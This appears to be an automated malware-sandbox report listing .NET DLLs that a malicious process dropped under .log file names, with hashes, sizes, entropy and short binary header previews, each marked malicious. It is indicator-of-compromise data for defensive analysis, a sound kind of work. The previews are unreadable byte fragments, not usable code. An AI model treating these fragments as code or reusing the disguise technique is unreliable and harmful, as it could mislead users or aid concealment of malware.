Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\sZJgMJEc.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tFeWToZU.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tLIouJOv.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\tQGWHnew.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\taBnhvKz.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\thNpVJYz.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tmQVayIT.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\uGVdoafs.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\uRCnOlqd.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\uaVdMMER.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vfCpeOMs.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vtdVTqPJ.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wEdgRRFC.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wHQFpXeP.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wNvWPtSq.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wSKhJewJ.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wlwnypob.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xTpVjUvY.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\xYDfcGYs.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xhSmheyM.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xiXwTpDV.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\xxeWQJRC.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\yAaeoIJF.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
